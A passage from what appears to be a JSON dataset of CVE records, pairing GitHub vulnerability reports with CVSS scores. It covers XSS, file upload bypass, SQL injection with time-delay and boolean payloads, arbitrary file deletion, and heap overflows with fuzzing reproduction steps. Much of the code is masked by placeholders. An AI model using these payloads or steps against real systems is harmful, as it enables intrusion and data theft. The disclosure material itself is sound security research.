        "description": "Arbitrary memory overwrite occurs when loading glyphs and rendering text with a malformed TTF file.. Hello, I found a vulnerability in this project. Summary Arbitrary memory overwrite occurs when loading glyphs and rendering text with a malformed TTF file. System Info Operating System: Ubuntu NUMBERTAG Detailed Description When the function APITAG is executed, it internally calls APITAG and APITAG . Since the code load and render glyph data after measuring bitmap size, if the measured size has a problem, it causes memory overflow or arbitrary memory write when rendering the data. The bitmap size of glyph affects variables xstart and ystart . And they are used to calculate the destination of APITAG . Therefore a malformed TTF file that has manipulated glyph data will result in memory corruption. If the rendered string has only characters that mapped malformed glyph data, APITAG occurs when calling APITAG . But, if the string has a character that mapped normally formed glyph data in front of the mal mapped character, the normal character is rendered with corrupted size while APITAG is normally called. So, the normal character's glyph data is overwritten to arbitrary memory addresses with corrupted xstart and ystart . The address will be heap or stack. In the below code and attached malformed TTF file, a character \"T\" has normal glyph data and a character \"S\" has malformed glyph data. Since The address of the calculated destination with xstart and ystart is not a valid memory address, a segmentation fault occurs. debugged data is below. ERRORTAG Reproduce compile the below code and run the program with a malformed TTF file. A malformed TTF file link is here URLTAG main.cpp ERRORTAG compile & run CODETAG Conclusion In my thought, the part of the responsibility for this vulnerability partially rests with APITAG Usually, opening malformed TTF file results in an error code. But in here, it doesn't. I will report this issue to APITAG However, I think it would be good to add the routine that checks the range of variables xstart and ystart before calling APITAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27476",
        "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/64",
        "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/64",
        "Repo_new": "newbee-ltd/newbee-mall",
        "Issue_Created_At": "2022-03-03T03:11:37Z",
        "description": "There is a Cross site scripting vulnerability exists in newbee mall. FILETAG APITAG APITAG alert(\u201cxss\u201d) APITAG in the input box and click Save to complete the form information submission. FILETAG FILETAG APITAG pop up window is triggered when the page is refreshed, and the loophole reproduction is completed FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-27477",
        "Issue_Url_old": "https://github.com/newbee-ltd/newbee-mall/issues/63",
        "Issue_Url_new": "https://github.com/newbee-ltd/newbee-mall/issues/63",
        "Repo_new": "newbee-ltd/newbee-mall",
        "Issue_Created_At": "2022-03-03T02:35:48Z",
        "description": "There is a File upload vulnerability exists in newbee mall. FILETAG APITAG burpsuite packet capturing agent and click to upload pictures. FILETAG NUMBERTAG By default, the system only supports JPG, PNG and GIF files. We can bypass them by modifying the file suffix. FILETAG APITAG the value of filename to FILETAG FILETAG Get the access path to file upload FILETAG Complete data update FILETAG APITAG the upload file path, and the vulnerability reproduction is completed. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27607",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/677",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/677",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2022-03-13T16:49:47Z",
        "description": "FILETAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-27820",
        "Issue_Url_old": "https://github.com/zaproxy/zaproxy/issues/7165",
        "Issue_Url_new": "https://github.com/zaproxy/zaproxy/issues/7165",
        "Repo_new": "zaproxy/zaproxy",
        "Issue_Created_At": "2022-03-24T09:53:42Z",
        "description": "Do not use ZAP CA cert for untrusted certs ( CVETAG ). This was originally reported to ZAP via APITAG We rated it as a LOW vulnerability and gave the reporter permission to disclose it, which they have done as CVETAG URLTAG . We have rated it as LOW as we expect ZAP users to know about the sites they are testing and to know not to send any sensitive information to those sites when testing them with ZAP. If testing potentially malicious sites then ZAP users should know to take additional precausions, such as running ZAP in a container environment. If you disagree with our assessment then please comment on this issue. We would have no problem with one of the suggested solutions being implemented but do not believe that this should be the default option. ZAP is heavily used in development environments where self signed certificates are common. Note that ZAP _does_ validate the certificates for the Check For Update functionality to ensure that malcious ZAP updates cannot be downloaded from an untrusted site. From the original report: Summary ZAP proxy does not verify the certificate chain of the HTTPS servers it connects to. For example, it connects without warning to servers presenting a self signed certificate, an expired certificate, etc. This opens up a browser configured to use ZAP as an intercepting proxy to NUMBERTAG man in the middle attacks NUMBERTAG DNS rebinding attacks (to HTTPS servers configured as default virtual server). Impact Man in the middle attack A user should currently avoid sending sensible information when using a browser through ZAP. In particular, he should avoid connecting using real accounts. Moreover, the user should avoid using an existing browser profile and always use a dedicated profile in order to avoid getting already existing sessions hijacked by a man in the middle. DNS rebinding attacks Moreover, a malicious web site could conduct a DNS rebinding attack on some HTTPS services which are usually not vulnerable to DNS rebinding attacks. The certificate chain validation usually blocks DNS rebinding against HTTPS sites. However, as this step is disabled when using ZAP as an intercepting proxy, any HTTPS site which is configured as the default virtual host ends up being vulnerable to DNS rebinding attacks. The attacker could use the user browser to try to attack such a vulnerable site while hiding behing the IP address of the ZAP user. For example, he could try to: brute force passwords; send stored XSS payload; send abusive posts, comments, spam, etc. Another interesting approach would be to attacks HTTPS services hosted in the user internal network, possibly bypassing firewalls, WAFs, etc. Details When connecting to a self signed invalid certificate, ZAP generates a valid generated from its own certificate authority. This certificate is configured as trusted in the browser in order to make the TLS interception work. As a consequence, the browser silently connects to this certificate. Resolution Mirroring the status of the original certificate chain This could be fixed by using the following behaviour by default: not generate a certificate signed by ZAP internal CA when the HTTPS server presents an untrusted certificate chain; replicate the validity period of the original certificate when generating its own server certificate. Using this approach, the user would be warned against invalid certificate chains but could choose to ignore the error by using the same procedure he would use without the intercepting proxy. FILETAG use a similar approach. Rejecting invalid certificate chains Another approach is to refuse the connection when the certificate chain is invalid. This approach is simpler to implement but not as convenient for the user who cannot easily the error. For example, when trying to connect HTTPS site presenting a self signed expired certificate, mitmproxy presents a certificate which is accepted by the browser but any HTTP request results in NUMBERTAG error APITAG Gateway). This HTTP error includes a message explaining the reason of the error such as: Certificate verification error for APITAG certificate has expired (errno NUMBERTAG depth NUMBERTAG Certificate verification error for APITAG Hostname mismatch (errno NUMBERTAG depth NUMBERTAG Certificate verification error for self APITAG self signed certificate (errno NUMBERTAG depth NUMBERTAG Certificate verification error for untrusted APITAG self signed certificate in certificate chain (errno NUMBERTAG depth NUMBERTAG ERRORTAG establish TLS with APITAG (sni: None): ERRORTAG validate certificate hostname without SNI')\")",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.0,
        "impactScore": 1.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2022-27920",
        "Issue_Url_old": "https://github.com/kiwix/libkiwix/issues/728",
        "Issue_Url_new": "https://github.com/kiwix/libkiwix/issues/728",
        "Repo_new": "kiwix/libkiwix",
        "Issue_Created_At": "2022-03-23T13:41:50Z",
        "description": "Release NUMBERTAG Following remark from MENTIONTAG at URLTAG Thanks, so URLTAG was only included in NUMBERTAG no released Debian versions are affected, just unstable). Could we do a NUMBERTAG release with just this cherry picked? I note that even APITAG is vulnerable to this. Or if NUMBERTAG is coming pretty soon then waiting wouldn't be too bad. And we should also get a CVE ID assigned for this vulnerability, MENTIONTAG if you haven't gone through this FILETAG before I'm happy to help out. I also believe we should not wait to much to make the release of NUMBERTAG Secure the CI is green on git master [ ] Kiwix Build is OK [ ] Update the Changelog [ ] Update version [ ] Close current milestone and create new one incrementaly (_a priori_ a minor version) [ ] Create a tag on git [ ] Secure new source/sbinaries are published on FILETAG [ ] Update the Github release with the Changelog [ ] Create new empty entry in Changelog (placeholder for future entries) [ ] Publicize these new versions",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-27938",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/163",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/163",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2022-03-19T20:57:10Z",
        "description": "FILETAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27939",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/717",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/717",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2022-03-04T08:24:03Z",
        "description": "Bug] Reachable assertion in get_layer NUMBERTAG You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug The assertion APITAG in APITAG at APITAG is reachable when the user uses tcprewrite to open a crafted pcap file. To Reproduce Steps to reproduce the behavior NUMBERTAG export CC=clang && export CFLAGS=\" fsanitize=address g NUMBERTAG FILETAG && ./configure disable shared disable local libopts && make clean && make j NUMBERTAG src/tcprewrite o /dev/null i POC output: ERRORTAG Expected behavior Program reports assertion failure and is terminated. Screenshots FILETAG System (please complete the following information): OS: Ubuntu OS version : can be reproduced in NUMBERTAG Clang version : clang NUMBERTAG release NUMBERTAG Tcpreplay Version : latest commit APITAG Acknowledgement FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27940",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/718",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/718",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2022-03-04T08:32:27Z",
        "description": "Bug] heap overflow in get_ip NUMBERTAG next. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug There is a heap overflow bug found in get_ip NUMBERTAG next, can be triggered via tcprewrite + APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG export CC=clang && export CFLAGS=\" fsanitize=address g NUMBERTAG FILETAG && ./configure disable shared disable local libopts && make clean && make j NUMBERTAG PATHTAG o /dev/null i POC output: ERRORTAG Screenshots FILETAG System (please complete the following information): OS: Ubuntu OS version : can be reproduced in NUMBERTAG clang version NUMBERTAG release NUMBERTAG Tcpreplay Version : latest commit APITAG Acknowledgement FILETAG )",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27941",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/716",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/716",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2022-03-03T19:41:11Z",
        "description": "Bug] heap overflow in get_l2len_protocol. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug There is a heap overflow bug found in get_l2len_protocol, can be triggered via tcpprep + APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG export CC=clang NUMBERTAG export CFLAGS=\" fsanitize=address g NUMBERTAG FILETAG && ./configure disable shared disable local libopts && make clean && make j NUMBERTAG PATHTAG auto=bridge pcap=$POC PATHTAG Expected behavior APITAG report that ./tcpprep has a heap buffer overflow in function get_l2len_protocol ERRORTAG Screenshots FILETAG System (please complete the following information): OS: Ubuntu (can be reproduced in NUMBERTAG Tcpreplay Version (latest commit APITAG Additional context Add any other context about the problem here.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27942",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/719",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/719",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2022-03-14T09:44:16Z",
        "description": "Bug] heap buffer overflow in parse_mpls. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug There is a heap overflow bug found in parse_mpls, can be triggered via tcpprep+ APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG export CC=clang && export CFLAGS=\" fsanitize=address g NUMBERTAG FILETAG && ./configure disable shared disable local libopts && make clean && make j NUMBERTAG PATHTAG auto=bridge pcap=$POC PATHTAG Output: ERRORTAG System (please complete the following information): OS: Ubuntu NUMBERTAG Clang NUMBERTAG Tcpreplay Version : latest commit APITAG Acknowledgement FILETAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27962",
        "Issue_Url_old": "https://github.com/xunyang1/my-vulnerability/issues/1",
        "Issue_Url_new": "https://github.com/xunyang1/my-vulnerability/issues/1",
        "Repo_new": "xunyang1/my-vulnerability",
        "Issue_Created_At": "2022-03-21T02:49:26Z",
        "description": "Bluecms NUMBERTAG has an SQL injection vulnerability at cooike. APITAG Find by rerce Bluecms NUMBERTAG download page : FILETAG vulnerability code: FILETAG line NUMBERTAG FILETAG For the $user_name parameter above\uff0cjust passed in the addslashes function FILETAG Moreover, it can be seen from the configuration file that GB NUMBERTAG encoding is adopted, so wide byte injection can be considered to bypass addslashes. FILETAG When we enter Cookie: BLUE FILETAG payload: Cookie: BLUE FILETAG Successful delay NUMBERTAG s. APITAG The same problem appears on line NUMBERTAG FILETAG follow FILETAG Same as the previous problem.the $user_name parameter above\uff0cjust passed in the addslashes function APITAG BLUE FILETAG Successful delay NUMBERTAG s.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27984",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/30",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/30",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2022-03-21T16:24:23Z",
        "description": "SQL injection vulnerability exists in APITAG PATHTAG VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the \"menu_filter NUMBERTAG parameters. Contact me: EMAILTAG APITAG Payload Boolean true: menu_filter NUMBERTAG and NUMBERTAG Payload Boolean false: menu_filter NUMBERTAG and NUMBERTAG Payload exploit example: APITAG Proof of concept (POC): FILETAG Payload Boolean true: menu_filter NUMBERTAG and NUMBERTAG FILETAG Payload Boolean false: menu_filter NUMBERTAG and NUMBERTAG You can see that the two return packets are different FILETAG Exploit: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27985",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/31",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/31",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2022-03-22T16:24:01Z",
        "description": "SQL injection vulnerability exists in APITAG PATHTAG VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the APITAG parameters. Github: URLTAG Product: APITAG Impact: Allow attacker inject query and access , disclosure of all data on the system. Payload: ERRORTAG Proof of concept (POC): FILETAG You can see injection code query into APITAG parameters as show below You see database and user as show below in the response FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28032",
        "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/263",
        "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/263",
        "Repo_new": "thedigicraft/atom.cms",
        "Issue_Created_At": "2022-03-21T09:10:59Z",
        "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG PATHTAG FILETAG payload:id=(sleep NUMBERTAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28033",
        "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/259",
        "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/259",
        "Repo_new": "thedigicraft/atom.cms",
        "Issue_Created_At": "2022-03-21T08:09:03Z",
        "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: sleep NUMBERTAG FILETAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28034",
        "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/261",
        "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/261",
        "Repo_new": "thedigicraft/atom.cms",
        "Issue_Created_At": "2022-03-21T08:36:04Z",
        "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: list FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28035",
        "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/260",
        "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/260",
        "Repo_new": "thedigicraft/atom.cms",
        "Issue_Created_At": "2022-03-21T08:20:19Z",
        "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: action=save&db=users APITAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28036",
        "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/262",
        "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/262",
        "Repo_new": "thedigicraft/atom.cms",
        "Issue_Created_At": "2022-03-21T08:58:14Z",
        "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG APITAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28041",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/1292",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/1292",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2022-02-17T15:52:07Z",
        "description": "UBSAN: integer overflow. Describe the bug ERRORTAG and ERRORTAG To Reproduce Built stb according to FILETAG with ERRORTAG UBSAN Output ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28042",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/1289",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/1289",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2022-02-17T11:13:28Z",
        "description": "APITAG heap use after free in stbi__jpeg_huff_decode. Describe the bug APITAG undefined behavior: index out of bounds + APITAG heap use after free in stbi__jpeg_huff_decode. To Reproduce Built stb according to FILETAG with ERRORTAG ASAN Output ERRORTAG Crashing file FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28044",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/216",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/216",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2022-02-24T18:06:02Z",
        "description": "Deallocation of control >suffix corrupts Heap Memory. The suffix field in the APITAG structure is initialized to point to global memory in initialize_control URLTAG URLTAG and in the lrzip main URLTAG . URLTAG However the field is then treated as a heap allocated variable while freeing the APITAG variable. Both in APITAG URLTAG and when setting a new suffix URLTAG Impact Corrupting the heap state may result in an exploitable vulnerability, especially if initialized with optarg that points to global RW memory. Fix It is sufficient to initialize APITAG using the return value of a strdup of the strings.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28048",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/1293",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/1293",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2022-02-17T15:56:39Z",
        "description": "UBSAN: shift exponent is too large. Describe the bug Several ERRORTAG and similar To Reproduce Built stb according to FILETAG with ERRORTAG UBSAN Output ERRORTAG Crashing files FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28053",
        "Issue_Url_old": "https://github.com/typemill/typemill/issues/325",
        "Issue_Url_new": "https://github.com/typemill/typemill/issues/325",
        "Repo_new": "typemill/typemill",
        "Issue_Created_At": "2022-03-20T02:42:15Z",
        "description": "NUMBERTAG Unrestricted File Upload Vulnerability. See PDF for details FILETAG :",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28056",
        "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/66",
        "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/66",
        "Repo_new": "gongfuxiang/shopxo",
        "Issue_Created_At": "2022-03-23T07:33:30Z",
        "description": "A system reinstall vulnerability was found in APITAG Hello, in my code audit process, I found system reinstallation vulnerability in APITAG NUMBERTAG the details are as follows: In APITAG file\uff0c Add function. FILETAG Do not have permission to check visitors, also didn't check whether installed database (check the APITAG exists Then the add function resets the original database data and writes the data submitted in the POST to APITAG , which can be injected into the code, resulting in RCE FILETAG Below is the attacked APITAG CODETAG Then open any page to see the APITAG page",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28059",
        "Issue_Url_old": "https://github.com/Verytops/verydows/issues/21",
        "Issue_Url_new": "https://github.com/verytops/verydows/issues/21",
        "Repo_new": "verytops/verydows",
        "Issue_Created_At": "2022-03-23T13:54:45Z",
        "description": "Verydows Exists Arbitrary File Deletion Vulnerability. Vulnerable file: PATHTAG It can be clearly seen that $file is not security filtered Vulnerable code\uff1a APITAG case 'delete': $file = request('file'); $error = APITAG if(!empty($file)) { if(is_array($file)) { foreach($file as $v) { APITAG $error FILETAG NUMBERTAG It can be seen that when the APITAG file exists, when visiting URLTAG the page will directly jump to the front home page FILETAG So as long as we delete the APITAG file, we can reinstall the APITAG we delete the APITAG file and visit URLTAG we will enter the installation wizard page FILETAG Repair suggestion: APITAG ../ or ..\\ in the file variable APITAG the scope of deleted files or directories",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28067",
        "Issue_Url_old": "https://github.com/sandboxie-plus/Sandboxie/issues/1714",
        "Issue_Url_new": "https://github.com/sandboxie-plus/sandboxie/issues/1714",
        "Repo_new": "sandboxie-plus/sandboxie",
        "Issue_Created_At": "2022-03-23T03:02:42Z",
